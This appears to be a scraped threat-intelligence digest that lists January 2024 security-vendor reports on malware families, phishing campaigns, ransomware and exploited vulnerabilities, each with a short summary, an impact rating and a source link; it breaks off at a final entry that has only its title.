Source: https://securelist.com/new-macos-backdoor-crypto-stealer/111778/

Intel Source:: CERT-UA

Intel Name:: Attack_With_UAC_0050_Using_RemoteUtilities

Date of Scan:: 2024-01-22

Impact:: LOW

Summary:: Researchers from CERT-UA have uncovered evidence of a widespread dissemination of emails purporting to be from the State Emergency Service of Ukraine and the State Special Communications Service. The emails contained links to Bitbucket or a RAR archive and were ostensibly about "evacuations" and "virus removal."

Source: https://cert.gov.ua/article/6277285

Intel Source:: Morphisec

Intel Name:: Update_to_the_Chaes_malware

Date of Scan:: 2024-01-22

Impact:: LOW

Summary:: Morphisec Threat Labs has provided an analysis of Chae$ 4.1, an update to the Chaes Infostealer malware.

Source: https://www.morphisec.com/hubfs/Chae$_Chronicles_Chaes4.1.pdf https://blog.morphisec.com/chaes-chronicles

Intel Source:: ASEC

Intel Name:: SmokeLoader_Distribution_Aims_at_Ukrainian_Government_and_Businesses

Date of Scan:: 2024-01-22

Impact:: MEDIUM

Summary:: Researchers from ASEC have found that the Ukrainian government and businesses are receiving many infections of the SmokeLoader virus. Attacks on Ukraine appear to have grown in frequency recently. The Ukrainian Department of Justice, government agencies, insurance providers, healthcare providers, building businesses, and manufacturing companies are among the targets that have been confirmed thus far.

Source: https://asec.ahnlab.com/en/60703/

Intel Source:: Greynoise

Intel Name:: Cryptomine_Exploit_Connect

Date of Scan:: 2024-01-22

Impact:: MEDIUM

Summary:: The article discusses a recent exploit of Ivanti Connect Secure, a remote access software, to install cryptominers on affected systems. It includes details on the files, file paths, IP addresses involved in the exploit, and recommendations for organizations to block the listed IPs. The article also provides a decoded URL and shell script used in the attack and advice for detecting and preventing similar attacks. The author shares their experience of discovering the exploit and provides a script that exploits Ivanti Connect Secure to install cryptominers. The article also discusses creating a plan for a task, including checking for sudo privileges and creating a system service for the miner. It also includes a configuration file for the miner and information on the pool it connects to.

Source: https://www.greynoise.io/blog/ivanti-connect-secure-exploited-to-install-cryptominers

Intel Source:: Trellix

Intel Name:: Kuiper_Ransomware_s_advanced_capabilities

Date of Scan:: 2024-01-22

Impact:: LOW

Summary:: Trellix researchers shared their analysis about the threat actor's sales post of the ransomware for Windows, Linux, and MacOS targeting binaries, and a version comparison. The version comparison is included in the technical analysis. The analyzed files, their hashes, and the detection information are listed at the end of this blog.

Source: https://www.trellix.com/about/newsroom/stories/research/the-evolution-of-the-kuiper-ransomware/

Intel Source:: Cado Security

Intel Name:: Using_9Hits_Maliciously_on_Susceptible_Docker_Hosts

Date of Scan:: 2024-01-22

Impact:: LOW

Summary:: Researchers at Cado Security have noticed a new campaign that targets weak Docker services. The campaign installs the 9hits viewer application and a standard XMRig miner in two containers on the vulnerable instance. This is the first instance of malware using the 9hits application as a payload that has been reported.

Source: https://www.cadosecurity.com/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts/

Intel Source:: Trellix

Intel Name:: Using_Discord_Bot_for_advanced_info_stealer

Date of Scan:: 2024-01-22

Impact:: LOW

Summary:: The article discusses a Java-based malware that is being spread through cracked software zip files. The malware uses a Discord bot channel as an EventListener to steal sensitive information from the victim's system. The delivery mechanism and threat analysis of the malware are discussed, along with its capabilities of stealing various data from browsers and applications. The article also includes indicators of compromise and recommendations for protection against such threats.

Source: https://www.trellix.com/about/newsroom/stories/research/java-based-sophisticated-stealer-using-discord-bot-as-eventlistener/

Intel Source:: Stairwal

Intel Name:: The_Trust_in_Digitally_Signed_Certificates_Is_Not_Always_Secure

Date of Scan:: 2024-01-22

Impact:: MEDIUM

Summary:: According to Stairwell threat experts, "Hainan YouHu Technology Co. Ltd." is in charge of sending Microsoft the LaiXi file so that it can be signed. This app is made for social media content marketing and bulk administration of mobile devices. This program may be downloaded for Windows and Android from dl.cnhack[.]com. Interestingly, the infected sample that is examined came from a LaiXi_setup.exe file.

Source: https://stairwell.com/resources/signed-sealed-but-not-always-secure-rethinking-trust-in-digitally-signed-certificates/

Intel Source:: Checkmarx

Intel Name:: A_malicious_Python_package_analysis

Date of Scan:: 2024-01-20

Impact:: LOW

Summary:: Checkmarx researchers did a deep analysis of a malicious Python package. Targeting the open-source space in the software industry is going on among threat actors, not only because it represents one of the largest attack surfaces, but because it often escapes the vigilant eyes of organizations.

Source: https://checkmarx.com/blog/when-the-hunter-becomes-the-hunted/

Intel Source:: Jamf

Intel Name:: New_malware_embedded_in_pirated_macOS_applications

Date of Scan:: 2024-01-20

Impact:: LOW

Summary:: Recently, Jamf Threat Labs researchers in their blog, analyzed malware they observed in pirated macOS applications. It seemed like these apps were similar to ZuRu malware, download and execute multiple payloads to compromise machines in the background.

Source: https://www.jamf.com/blog/jtl-malware-pirated-applications/

Intel Source:: ISC.SANS

Intel Name:: A_malicious_Python_script_attacks_macOS_apps

Date of Scan:: 2024-01-20

Impact:: LOW

Summary:: Xavier Mertens, an ISC SANS researcher found a malicious Python script targeting wallet applications on macOS. It targets two applications: Exodus3 and Bitcoin Core. It searches for occurrences of these applications.

Source: https://isc.sans.edu/diary/rss/30572

Intel Source:: Trustwave

Intel Name:: Stealthy_Godzilla_Webshell_Exploits_ActiveMQ_Vulnerability

Date of Scan:: 2024-01-19

Impact:: MEDIUM

Summary:: Researchers at Trustwave have seen an increase in attacks that take advantage of holes in Apache ActiveMQ hosts. Sometimes, sites host malicious web shells called Java Server Pages (JSP). The web shells are made to elude security and signature-based scanners by being hidden inside an unidentified binary format. Interestingly, the web shell is still compiled and run by ActiveMQ's JSP engine even if the binary's file format is unknown.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/apache-activemq-vulnerability-leads-to-stealthy-godzilla-webshell/

Intel Source:: Phylum

Intel Name:: AnyDesk_Installed_With_OScompatible_Package_by_Npm_Trojan

Date of Scan:: 2024-01-19

Impact:: LOW

Summary:: An advanced remote access trojan have discovered to be installed on infected Windows computers by a malicious package that was posted to the npm registry. The software, dubbed "oscompatible," was made available on January 9, 2024, and was downloaded 380 times in total before being removed.

Source: https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/

Intel Source:: Google Blog

Intel Name:: A_Russian_Threat_Group_Using_Malware_to_Target_Western_Officials

Date of Scan:: 2024-01-19

Impact:: MEDIUM

Summary:: Researchers from the Google Analysis Group have examined a number of persistent threats, such as COLDRIVER (also referred to as UNC4057, Star Blizzard, and Callisto), a Russian threat group that specializes in credential phishing attacks against prominent figures in NGOs, former military and intelligence officers, and NATO governments.

Source: https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/

Intel Source:: Rapid7

Intel Name:: A_new_stealer_named_Atlantida

Date of Scan:: 2024-01-19

Impact:: LOW

Summary:: This month, Rapid7 noticed a new stealer called Atlantida. The stealer makes users download a malicious file from a compromised website and uses different techniques such as reflective loading and injection before the stealer is loaded. Atlantida has a lot of different capabilities from stealing login information of software like Telegram, and Steam, several offline cryptocurrency wallet data, browser stored data as well as cryptocurrency wallet browser extension data. It also captures the victim's screen and collects hardware data.

Source: https://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/

Intel Source:: Huntress

Intel Name:: The_use_of_TeamViewer_by_ransomware_deployment

Date of Scan:: 2024-01-19

Impact:: LOW

Summary:: Huntress security analysts recently warned their customers about two disparate endpoints identified as low impacted by ransomware. An investigation into each endpoint illustrated that initial access to each endpoint was achieved via TeamViewer.

Source: https://www.huntress.com/blog/ransomware-deployment-attempts-via-teamviewer

Intel Source:: Splunk

Intel Name:: An_analysis_of_the_DarkGate_AutoIt_Loader

Date of Scan:: 2024-01-19

Impact:: LOW

Summary:: The Splunk Threat researchers provided a deep analysis of DarkGate malware and its use of AutoIt in their blog.

Source: https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html

Intel Source:: Volexity, CISA

Intel Name:: New_Observations_of_Ivanti_Connect_Secure_VPN_Exploitation

Date of Scan:: 2024-01-19

Impact:: MEDIUM

Summary:: Volexity shared the details of new detailed scanning and exploitation by threat actors using still non-public exploits to compromise different devices. Subsequently, Volexity has observed an increase in attacks from various threat actors against Ivanti Connect Secure VPN appliances beginning on January 16th, 2024. The new observations were GIFTEDVISITOR webshell that Volexity scanned for, which led to the initial discovery of over 1,700 compromised Ivanti Connect Secure VPN devices. Also, UTA0178 had made modifications to the in-built Integrity Checker Tool. CISA also issued an Emergency Directive on Ivanti Vulnerabilities.

Source: https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/ https://www.cisa.gov/news-events/alerts/2024/01/19/cisa-issues-emergency-directive-ivanti-vulnerabilities

Intel Source:: Proofpoint

Intel Name:: A_Massive_Email_Campaign_Brings_TA866_Back

Date of Scan:: 2024-01-18

Impact:: MEDIUM

Summary:: Researchers at Proofpoint have discovered that, following a nine-month hiatus, TA866 has returned to exploit email campaign data. Proofpoint stopped a massive campaign with thousands of emails aimed at North America on January 11, 2024. Emails with an invoice theme included PDF attachments with titles like "Document_[10 digits].pdf" and different subject lines like "Project achievements." The PDF files included OneDrive URLs that, when clicked, started a series of steps that eventually led to the malware payload—a WasabiSeed and Screenshotter custom variant.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta866-returns-large-email-campaign

Intel Source:: CyberGeeks

Intel Name:: AI_generated_videos_attacked_Romania

Date of Scan:: 2024-01-18

Impact:: LOW

Summary:: Cybergeeks researchers continue to see the threat for AI-generated videos in different industries and recently seen a YouTube ad that presented a “unique” opportunity to invest in stocks. The attackers used a legitimate Podcast that was modified using AI. The researchers concluded that the account promoting the unlisted video was compromised

Source: https://cybergeeks.tech/attackers-target-romania-using-ai-generated-videos/

Intel Source:: ASEC

Intel Name:: Hackers_Install_Mimo_CryptoMiner_And_Mimus_Ransomware

Date of Scan:: 2024-01-18

Impact:: LOW

Summary:: Recently, ASEC researchers have documented instances where a CoinMiner threat actor named Mimo has installed malware by taking advantage of different vulnerabilities. In March 2022, they installed CoinMiners via a Log4Shell vulnerability exploitation, which is how Mimo, also known as Hezb, was initially discovered.

Source: https://asec.ahnlab.com/en/60440/

Intel Source:: Antiy

Intel Name:: A_Detailed_Analysis_of_Aquabot

Date of Scan:: 2024-01-18

Impact:: LOW

Summary:: Researchers from Antiy CERT have discovered a new version of the Mirai botnet that targets a variety of architectures, including X86, ARM, and MIPS. It waits for control instructions to launch DDoS attacks after infecting targets with weak passwords. They gave it the name Aquabot since the botnet file name is derived from "Aqua*".

Source: https://www.antiy.cn/research/notice&report/research_report/Aquabot.html

Intel Source:: Qianxin

Intel Name:: A_new_variant_of_the_Mirai_malware_known_as_Rimasuta

Date of Scan:: 2024-01-18

Impact:: MEDIUM

Summary:: A new variant of the Mirai malware, known as Rimasuta, has recently resurfaced in samples captured by 360netlab in Japan, but has undergone a significant change in its encryption algorithm.

Source: https://blog.xlab.qianxin.com/rimasuta-new-variant-switches-to-chacha20-encryption-en/

Intel Source:: Microsoft

Intel Name:: High_Profile_Individuals_Targeted_by_Mint_Sandstorm_Campaign

Date of Scan:: 2024-01-18

Impact:: MEDIUM

Summary:: Microsoft researchers have been tracking a specific subset of Mint Sandstorm (PHOSPHORUS) since November 2023. This subset has been observed to target prominent persons who focus on Middle Eastern politics at universities and research institutions in Belgium, France, Gaza, Israel, the United Kingdom, and the United States. During this campaign, Mint Sandstorm attempted to trick targets into downloading infected files by using custom phishing lures. Microsoft discovered novel post-intrusion techniques in a few instances, including the introduction of a brand-new, specially designed backdoor known as MediaPl.

Source: https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/

Intel Source:: Cyble

Intel Name:: Info_Stealing_Malware_Potentially_Targeting_Indian_Air_Force

Date of Scan:: 2024-01-18

Impact:: HIGH

Summary:: Researchers at Cyble have discovered a fresh spy operation that might use malware to steal information from the Indian Air Force. The unknown threat actor lured victims with phishing emails that included a link to a malicious.zip file purporting to provide information on Su-30 fighter jets. India authorized the purchase of these aircraft last year in order to support its current defense modernization initiatives.

Source: https://cyble.com/blog/cyber-espionage-attack-on-the-indian-air-force-go-based-infostealer-exploits-slack-for-data-theft/

Intel Source:: Esentire

Intel Name:: The_delivery_of_WorkersDevBackdoor

Date of Scan:: 2024-01-18

Impact:: LOW

Summary:: In November 2023, eSentire’s Threat Response Unit (TRU) detected WorkersDevBackdoor malware impacting a customer in business services industry. This malware spreads through malicious online ads, tricking users into downloading it by mimicking legitimate software. Once installed, it secretly collects sensitive information and provides backdoor access to the infected system.

Source: https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising

Intel Source:: ASEC

Intel Name:: Spread_of_LockBit_Ransomware_Using_Word_Documents

Date of Scan:: 2024-01-18

Impact:: MEDIUM

Summary:: Researchers from ASEC have discovered that starting last month, Word files are being used to spread the LockBit ransomware. Notably, malicious Word files were recently discovered to be masquerading as resumes, which is another way that the LockBit ransomware typically spreads. In 2022, it was discovered that the LockBit ransomware spreads using external URLs in Word documents.

Source: https://asec.ahnlab.com/en/60633/

Intel Source:: Security Score Card

Intel Name:: The_compromise_of_Cisco_devices_by_Volt_Typhoon

Date of Scan:: 2024-01-18

Impact:: MEDIUM

Summary:: Chinese state-sponsored group continues to actively compromiseCisco devices possibly affected by vulnerabilities publicly disclosed in 2019. Approximately 30% of the Cisco RV320/325 devices observed by SecurityScorecard in a 37-day period may have been compromised by Volt Typhoon. The Cisco RV320/325 vulnerability was publicly disclosed in January 2019. The devices are end-of-life, so Cisco has not released and will not release software updates to address vulnerabilities affecting them.

Source: https://resources.securityscorecard.com/research/volt-typhoon

Intel Source:: Mcafee

Intel Name:: An_Overview_of_VBS_Script_Driven_Campaigns

Date of Scan:: 2024-01-18

Impact:: LOW

Summary:: Researchers at McAfee have observed a complex VBS campaign that uses obfuscated Visual Basic Scripting (VBS). After starting off as a campaign that distributed the AgentTesla malware, it has developed into a multifaceted threat that uses VBS scripts as a flexible delivery system. This campaign serves as an example of a thorough infection procedure that is started by an email-delivered VBS file. It begins with a VBS script that is activated, then it moves via PowerShell stages, using the BitsTransfer tool to retrieve a second PowerShell script.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vbs-script-driven-campaign/

Intel Source:: Checkpoint

Intel Name:: Microsoft_as_the_top_number_impersonated_brand

Date of Scan:: 2024-01-17

Impact:: LOW

Summary:: Last quarter of 2023 year, Microsoft was on the top spot as the number one most impersonated brand, accounting for 33% of all brand phishing attempts. The technology sector stood out as the most targeted industry overall Checkpoint researchers said.

Source: https://blog.checkpoint.com/research/microsoft-returns-to-the-top-spot-as-the-most-imitated-brand-in-phishing-attacks-for-q4-2023/

Intel Source:: Walmart Global Tech Blog

Intel Name:: Analysis_of_Keyholes

Date of Scan:: 2024-01-17

Impact:: LOW

Summary:: Keyhole is a multipurpose VNC/Backconnect component that is heavily utilized by Anubis and IcedID. Although the malware has features that have been previously documented as standard VNC and HDESK capabilities, there doesn't seem to be much technical information available regarding some of the other features that are currently present.

Source: https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03

Intel Source:: NSFocus Global

Intel Name:: The_New_Botnet_RDDoS

Date of Scan:: 2024-01-17

Impact:: LOW

Summary:: NSFOCUS's Global Threat Hunting System discovered a widespread spread of an unknown elf file, leading to the identification of a new botnet named RDDoS. This botnet, primarily designed for launching DDoS attacks, possesses command execution capabilities, distinguishing it as a formidable threat. The botnet's favored attack method is ICMP_flood, with the United States, Brazil, and France being its primary targets. The analysis reveals the botnet's relatively uncomplicated nature, but its continuous updates and iterations pose an evolving threat. NSFOCUS emphasizes the need for heightened attention to emerging botnet families like RDDoS, emphasizing ongoing monitoring and offering an Anti-DDoS solution to counter this rising threat effectively.

Source: https://nsfocusglobal.com/nsfocus-reveals-new-botnet-family-rddos/

Intel Source:: Sentinelone

Intel Name:: The_rise_of_infostealers_targeting_macOS

Date of Scan:: 2024-01-17

Impact:: MEDIUM

Summary:: In this post, Sentilone shared details on three active infostealers that are currently evading many static signature detection engines.

Source: https://www.sentinelone.com/blog/the-many-faces-of-undetected-macos-infostealers-keysteal-atomic-cherrypie-continue-to-adapt/

Intel Source:: Russian Panda

Intel Name:: Atomic_Stealer_First_MacOS_Threat_Unveiled

Date of Scan:: 2024-01-17

Impact:: MEDIUM

Summary:: Discovered in March 2023, Atomic Stealer is the inaugural MacOS-targeting stealer, offering a sophisticated panel for $3000 monthly. Boasting advanced features such as keychain extraction, password retrieval, and browser data theft, it recently evolved with encrypted strings and anti-VM checks. The threat minimizes traces on infected devices, presenting a formidable challenge to cybersecurity. Special thanks to Edward Crowder and @cod3nym for their contributions

Source: https://russianpanda.com/2024/01/15/Atomic-Stealer-AMOS/

Intel Source:: Malwarebytes

Intel Name:: Facebook_Scammers_Exploit_BBC_Branding_in_Morbid_Scheme

Date of Scan:: 2024-01-17

Impact:: LOW

Summary:: In a recent Facebook scam, cybercriminals employ BBC branding to lure victims into a morbid scheme. The scam involves posts claiming the tragic loss of someone, accompanied by a link to a fake BBC news item about a fatal road accident. The posts tag Facebook friends to trigger curiosity. Clicking on the link redirects users through various steps, likely performing fingerprinting to gather information. The scam uses a URL format like "BBCNEWS-{6 characters}.OMH4.XYZ." While testing, the redirection led to a known source of pop-ups, potentially unwanted programs, and fraudulent sites. The article provides tips on avoiding Facebook scams, including scrutinizing URLs, reaching out to friends outside the platform for verification, being cautious of "free" offers, regular browser updates, changing login credentials, and using browser protection tools. Users are encouraged to report suspicious posts to protect themselves and others from online threats.

Source: https://www.malwarebytes.com/blog/news/2024/01/ill-miss-him-so-much-facebook-scam-uses-bbc-branding-to-lure-victims

Intel Source:: ANY.RUN

Intel Name:: Detailed_Analysis_of_Pure_Malware_Family

Date of Scan:: 2024-01-16

Impact:: LOW

Summary:: Researchers from AnyRun have examined PureCrypter, one of the most peculiar crypters, and PureLogs, a multipurpose stealer. Several intriguing samples were discovered by them while they were reviewing Public Submissions. Unusual traffic that appeared to be related to encryption operations on executable files with short keys and high entropy TCP connections piqued their interest.

Source: https://any.run/cybersecurity-blog/pure-malware-family-analysis/

Intel Source:: Cyble

Intel Name:: Azorult_malware_back

Date of Scan:: 2024-01-16

Impact:: LOW

Summary:: Cyble researchers came across the activity of old Azorult malware that was identified in 2016 and functions as an information-stealing threat. It can get diverse data, including browsing history, cookies, login credentials, and cryptocurrency details.

Source: https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/

Intel Source:: CISA

Intel Name:: Threat_actors_deployed_an_Androxgh0st_malware

Date of Scan:: 2024-01-16

Impact:: HIGH

Summary:: The FBI and the CISA are releasing their joint cybersecurity advisory about threat associated with threat actors deploying Androxgh0st malware. Androxgh0st malware has been observed establishing a botnet for victim identification and exploitation in target networks.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a https://www.cisa.gov/sites/default/files/2024-01/aa24-016a-known-indicators-of-compromise-associated-with-adroxgh0st-malware_0.pdf

Intel Source:: TrendMicro

Intel Name:: Phemedrone_Malware_Dropped_by_Windows_SmartScreen_Bug

Date of Scan:: 2024-01-16

Impact:: LOW

Summary:: Trend Micro researchers discovered a malware campaign employing Phemedrone, which exploits a Microsoft Defender SmartScreen vulnerability to bypass Windows security prompts when opening URL files. This open-source info-stealer focuses on extracting data from web browsers, cryptocurrency wallets, and applications like Discord, Steam, and Telegram. The gathered data is then sent to attackers for potential malicious purposes or sale to other threat actors.

Source: https://www.trendmicro.com/en_us/research/24/a/cve-2023-36025-exploited-for-defense-evasion-in-phemedrone-steal.html

Intel Source:: ASEC

Intel Name:: Remcos_RAT_Distributing_via_Webhards

Date of Scan:: 2024-01-15

Impact:: LOW

Summary:: Researchers from ASEC have discovered that webhards are being used to spread the Remcos RAT virus, which is masquerading as adult games. In Korea, webhards and torrents are popular delivery channels for malware.

Source: https://asec.ahnlab.com/en/60270/

Intel Source:: TrueSec

Intel Name:: A_Mallox_Ransomware_Victim

Date of Scan:: 2024-01-15

Impact:: LOW

Summary:: The Mallox threat actor have a history of gaining early access by taking advantage of vulnerable MSSQL servers. The initial signs of the threat actor were discovered during the analysis of an unprotected MSSQL web server. There were many dropper PowerShell scripts found in the Appdata directory for the service account that was operating the SQL service. Take the script "alta.ps1," for example.

Source: https://www.truesec.com/hub/blog/a-victim-of-mallox-ransomware-how-truesec-csirt-fought-back

Intel Source:: ISC.SANS

Intel Name:: An_Analysis_of_Phishing_Email

Date of Scan:: 2024-01-12

Impact:: LOW

Summary:: SANS researchers have talked on how obfuscation works in malicious scripts. They discovered a VB script that poses as a PDF document. It arrived as usual in the form of a zip archive attached to a phishing email. "rfw_po_docs_order_sheet_01_10_202400000000_pdf.vbs" is the filename.

Source: https://isc.sans.edu/diary/One+File+Two+Payloads/30558/

Intel Source:: Sucuri

Intel Name:: WordPress_Sites_Are_Infected_by_Balada_Injector

Date of Scan:: 2024-01-12

Impact:: LOW

Summary:: In a campaign that began in mid-December, a little over 6,700 WordPress websites that used a vulnerable version of the Popup Builder plugin were compromised by the Balada Injector malware.

Source: https://blog.sucuri.net/2024/01/thousands-of-sites-with-popup-builder-compromised-by-balada-injector.html

Intel Source:: CERT-UA

Intel Name:: UAC_0050_Armed_RemcosRAT_QuasarRAT_RemoteUtilities

Date of Scan:: 2024-01-12

Impact:: MEDIUM

Summary:: CERT-UA researchers have located and examined numerous letters that have an attachment that is a ZIP archive bearing the same name. The latter includes a TXT file that requires a password and a password-protected multivolume RAR archive.

Source: https://cert.gov.ua/article/6277063

Intel Source:: Zscaler

Intel Name:: A_New_Exploit_Module_From_DreamBus_Releases_Metabase_Mayhem

Date of Scan:: 2024-01-12

Impact:: LOW

Summary:: Researchers from Zscaler's ThreatLabz have tracked down the DreamBus malware family, which is based on Linux. Other than a few minor bug patches and slight adjustments to avoid being detected by security software, not much has changed in the last several years. To exploit weaknesses in Metabase and Apache RocketMQ, the threat actor behind DreamBus has, nevertheless, released two new modules during the past six months.

Source: https://www.zscaler.com/blogs/security-research/dreambus-unleashes-metabase-mayhem-new-exploit-module

Intel Source:: Trendmicro

Intel Name:: FIFA_World_cyber_threats

Date of Scan:: 2024-01-12

Impact:: LOW

Summary:: Trend Micro, a cybersecurity company, played a crucial role in protecting the 2022 FIFA World Cup from cyber threats. They collaborated with law enforcement, particularly INTERPOL, to monitor and report any malicious websites and scams related to the event. Their global threat intelligence was also shared to prevent attacks and mitigate risks. The article delves into the various cyber threats discovered, including fake ticketing systems, live streaming sites, survey scams, and crypto scams. By supporting INTERPOL and the World Cup, Trend Micro fulfilled its mission of making the digital world a safer place.

Source: https://www.trendmicro.com/en_us/research/24/a/trend-micro-defends-fifa-world-cup-from-cyber-threats.html

Intel Source:: Palo Alto

Intel Name:: The_Medusa_ransomware_capabilities

Date of Scan:: 2024-01-12

Impact:: LOW

Summary:: The article discusses the Medusa ransomware and its capabilities, including the use of two drivers to target specific security products and a customized tool for remote deployment. It also mentions the use of remote scripting and Cyrillic scripts, possibly referencing the creators' preferred language. The article provides a list of commands to stop various services on a computer to prevent the ransomware from encrypting files. It also discusses the use of string and RSA encryption for protecting the ransomware's key. The article mentions the escalation of Medusa ransomware activities and a shift towards extortion, as well as the involvement of the Unit 42 Incident Response team in a Medusa incident. It provides protections and mitigations for Palo Alto Networks customers and discusses the tools and techniques used by the Medusa group, including webshells and defense evasion techniques.

Source: https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/

Intel Source:: Forescout

Intel Name:: Denmark_and_Ukraines_Energy_Sector_Attacks

Date of Scan:: 2024-01-12

Impact:: MEDIUM

Summary:: Forescout researchers have analyzed two newly publicized attacks targeting the energy sectors in Denmark and Ukraine. So far, the attacks have been linked, if tenuously, to the Russian military threat actor Sandworm, one of the most well-known APT organizations operating at the moment.

Source: https://www.forescout.com/resources/clearing-the-fog-of-war/

Intel Source:: Volexity

Intel Name:: Ivanti_Connect_Secure_VPN_Exploited

Date of Scan:: 2024-01-11

Impact:: MEDIUM

Summary:: Researchers from Volexity have discovered that two vulnerabilities in Ivanti Connect Secure VPN devices allowing unauthenticated remote code execution are now being exploited in the wild.

Source: https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

Intel Source:: Malwarebytes

Intel Name:: Mac_users_facing_a_New_Year_threat_with_the_Obfuscated_Atomic_Stealer

Date of Scan:: 2024-01-11

Impact:: LOW

Summary:: Malwarebytes researchers discovered an upgraded version of the Atomic Stealer, actively targeting Mac users through malicious ads on Google Search. This insidious threat is specifically designed to harvest passwords and other sensitive files that are usually restricted in access.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version

Intel Source:: Sentinelone

Intel Name:: FBot_Malware_Targeting_Cloud_and_Payment_Services

Date of Scan:: 2024-01-11

Impact:: LOW

Summary:: Researchers at SentinelLabs have discovered a Python-based hacking tool called FBot that is unique from previous families of cloud malware that targeting cloud services, SaaS platforms, and web servers like Office365, AWS, PayPal, Sendgrid, and Twilio.

Source: https://www.sentinelone.com/labs/exploring-fbot-python-based-malware-targeting-cloud-and-payment-services/

Intel Source:: Securonix

Intel Name:: Turkish_Hackers_Target_MSSQL_servers_to_deliver_MIMIC_Ransomware

Date of Scan:: 2024-01-10

Impact:: MEDIUM

Summary:: Financially motivated Turkish threat actors appear to be actively targeting MSSQL servers in an effort to deliver MIMIC ransomware payloads. The Securonix Threat Research team has been monitoring an ongoing threat campaign, RE#TURGENCE which involves the targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting US, EU and LATAM countries and are financially motivated.

Source: https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/

Intel Source:: Fortinet

Intel Name:: Hackers_Targeting_YouTube_Channels_to_Scatter_Lumma_Stealer

Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: Researchers at FortiGuard Labs have identified a threat group using YouTube channels to spread a Lumma Stealer variant. This malicious actor targeting the sensitive information, along with user credentials, system details, browser data, and extensions.

Source: https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube

Intel Source:: Aquasec

Intel Name:: A_new_attack_targeting_Apache_Hadoop_and_Flink_applications

Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: The article discusses a new cyber attack targeting Apache Hadoop and Flink applications, which was uncovered by researchers at Aqua Nautilus. The attack involves the use of packers and rootkits to conceal the malware, making it difficult for traditional security defenses to detect. The attack exploits a misconfiguration in the ResourceManager of Hadoop YARN, allowing unauthenticated users to create and run applications.

Source: https://blog.aquasec.com/threat-alert-apache-applications-targeted-by-stealthy-attacker

Intel Source:: Palo Alto

Intel Name:: Protection_analysis_against_GuLoader_and_RedLine_Stealer_malware

Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: Unit 42 Palo Alto introduced selected configuration protection techniques employed by two malware families: GuLoader and RedLine Stealer.

Source: https://unit42.paloaltonetworks.com/malware-configuration-extraction-techniques-guloader-redline-stealer/#post-131796-_v8176g40kstn

Intel Source:: ISC.SANS

Intel Name:: User_agent_web_resource_connection

Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: Jesse La Grew, ISC SANS researcher, explained in his paper how devices are connecting to different web resources on a regular basis. And about one of method to identify what is connecting to a web resource is through a user agent.

Source: https://isc.sans.edu/diary/rss/30536

Intel Source:: Cyble

Intel Name:: New_Year_themed_spam_emails_campaign

Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: Cyble researchers discovered a ZIP archive file that could potentially spread through New Year-themed spam emails. The ZIP attachment contains a shortcut file disguised as a PNG image.

Source: https://cyble.com/blog/festive-facade-dissecting-multi-stage-malware-in-new-year-themed-lure/

Intel Source:: Esentire

Intel Name:: Ducktail_and_Peeling_PowerShell_Layers

Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: The eSentire Threat Response Unit discovered a failed effort to infect a customer's employee with Ducktail malware, which was directed towards digital marketing at a business services company. The employee received a private message from Ducktail distributors on LinkedIn, along with an attachment that opened a ZIP archive.

Source: https://www.esentire.com/blog/ducktail-and-peeling-the-layers-of-powershell

Intel Source:: Cyfirma

Intel Name:: Deep_analysis_of_a_mining_threat_spreaded_through_a_YouTube

Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: This comprehensive analysis delves into the dissemination of cryptocurrency miners through a YouTube channel. Examining the tactics employed, the report reveals a concerning trend of malicious actors leveraging popular video-sharing platforms to distribute mining threats. The study explores the various evasion techniques, employed by threat actors to avoid detection. Additionally, it sheds light on the processes for generating resilient malware payloads.

Source: https://www.cyfirma.com/outofband/decoding-the-cryptocurrency-malware-landscape-a-comprehensive-analysis-of-a-mining-threat-disseminated-through-a-youtube-channel/

Intel Source:: ForcePoint

Intel Name:: A_Novel_Advanced_Malware_Attack_on_Microsoft_Office

Date of Scan:: 2024-01-10

Impact:: MEDIUM

Summary:: Researchers from Forcepoint X-Labs have discovered a sophisticated Microsoft Office-based attack that targets well-known corporate executives just before a nation's general elections.

Source: https://www.forcepoint.com/blog/x-labs/advanced-malware-attack-using-microsoft-office

Intel Source:: Garwarner

Intel Name:: Storm_1152_used_their_CAPTCHA_cracking_capabilities

Date of Scan:: 2024-01-10

Impact:: LOW

Summary:: Microsoft’s Digital Crime Unit posted their deep analysis on how it disrupts cybercrime. In their post they discuss the case against the hackers team called Storm-1152. DCU team thinks that Storm-1152 used their CAPTCHA-cracking capabilities to assist other criminals in the massive creation of Microsoft email accounts, such as Hotmail and Outlook accounts. There were 750 MILLION email accounts created for illicit purposes.

Source: https://garwarner.blogspot.com/2023/12/vietnams-massive-captcha-crackers-vs.html

Intel Source:: Cyfirma

Intel Name:: Syrian_Hackers_Distributing_Stealthy_C_Sharp_Based_Silver_RAT

